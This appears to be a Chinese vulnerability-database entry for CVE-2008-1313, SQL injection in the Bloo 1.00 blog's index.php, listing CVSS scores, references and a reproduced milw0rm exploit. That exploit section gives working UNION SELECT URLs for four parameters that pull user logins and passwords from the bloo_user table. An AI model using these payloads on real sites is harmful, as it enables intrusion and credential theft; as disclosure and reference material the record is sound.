CVE-2008-1313 |
|
发布时间 :2008-03-12 13:44:00 | ||
修订时间 :2008-09-05 00:00:00 | ||||
NMCOE |
[原文]Multiple SQL injection vulnerabilities in index.php in Bloo 1.00 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) post_id, (2) post_category_id, (3) post_year_month, and (4) static_page_id parameters; and unspecified other vectors.
[CNNVD]bloo ‘index.php’ 多个SQL注入漏洞(CNNVD-200803-205)
Bloo 中的index.php存在多个SQL注入漏洞。远程攻击者通过(1) post_id, (2) post_category_id, (3) post_year_month, 以及(4) static_page_id 参数; 与其他未明向量,以执行任意SQL命令。
–
CVSS (基础分值)
CVSS分值: | 7.5 | [严重(HIGH)] |
机密性影响: | PARTIAL | [很可能造成信息泄露] |
完整性影响: | PARTIAL | [可能会导致系统文件被修改] |
可用性影响: | PARTIAL | [可能会导致性能下降或中断资源访问] |
攻击复杂度: | LOW | [漏洞利用没有访问限制 ] |
攻击向量: | NETWORK | [攻击者不需要获取内网访问权或本地访问权] |
身份认证: | NONE | [漏洞利用无需身份认证] |
–
CWE (弱点类目)
CWE-89 | [SQL命令中使用的特殊元素转义处理不恰当(SQL注入)] |
–
CPE (受影响的平台与产品)
产品及版本信息(CPE)暂不可用 |
–
OVAL (用于检测的技术细节)
未找到相关OVAL定义 |
–
官方数据库链接
–
其它链接及资源
http://xforce.iss.net/xforce/xfdb/41141 (UNKNOWN) XF bloo-index-sql-injection(41141) |
http://www.securityfocus.com/bid/28203 (UNKNOWN) BID 28203 |
http://www.milw0rm.com/exploits/5234 (UNKNOWN) MILW0RM 5234 |
http://secunia.com/advisories/29338 (VENDOR_ADVISORY) SECUNIA 29338 |
–
漏洞信息
bloo ‘index.php’ 多个SQL注入漏洞 | |
高危 | SQL注入 |
2008-03-12 00:00:00 | 2008-09-05 00:00:00 |
远程 | |
Bloo 中的index.php存在多个SQL注入漏洞。远程攻击者通过(1) post_id, (2) post_category_id, (3) post_year_month, 以及(4) static_page_id 参数; 与其他未明向量,以执行任意SQL命令。 |
–
公告与补丁
目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://outofthebloo.com/ |
–
漏洞信息 (5234)
Bloo <= 1.00 Multiple Remote SQL Injection Vulnerabilities (EDBID:5234) | |
php | webapps |
2008-03-11 | Verified |
0 | MhZ91 |
N/A |
[点击下载] |
--==+================================================================================+==-- --==+ Bloo - Object Oriented Blog Software <= v.1.00 Remote Sql Injection +==-- --==+================================================================================+==-- Author: MhZ91 Title: Bloo - Object Oriented Blog Software <= v.1.00 Remote Sql Injection Download: http://sourceforge.net/project/showfiles.php?group_id=160870 Bug: Remote Sql Injection Info: Bloo is a free, public-domain, object-oriented implementation of full-featured blog software, based on the Phoo Phramework. You can visit the Bloo home wiki at http://outofthebloo.com. Visit: http://www.inj3ct-it.org [*]---------------------------------------------------------- Bloo - Object Oriented Blog Software <= v.1.00 present more sql injection... http://www.example.com/index.php?post_id=1+union+select+1,concat(login_id,char(58),password),3,4,5,6,7,8+from+bloo_user/* http://www.example.com/index.php?post_category_id=1+union+select+1,2,3,4,concat(login_id,char(58),password),6,7,8+from+bloo_user/* http://www.example.com/index.php?post_year_month=[NumberIdOfExistentPost]+union+select+1,2,3,4,concat(login_id,char(58),password),6,7,8+from+bloo_user/* http://www.example.com/index.php?static_page_id=1+union+select+1,user(),3,4,5,6/* etc... etc... etc... I think there are other sql injection in this blog lol [*]---------------------------------------------------------- # milw0rm.com [2008-03-11]
-
漏洞信息
42778 |
|
Bloo index.php Multiple Parameter SQL Injection | |
Remote / Network Access |
Information Disclosure, Input Manipulation |
Loss of Confidentiality, Loss of Integrity |
Solution Unknown |
Exploit Public | Uncoordinated Disclosure |
-
漏洞描述
-
时间线
2008-03-11 |
Unknow |
2008-03-11 | Unknow |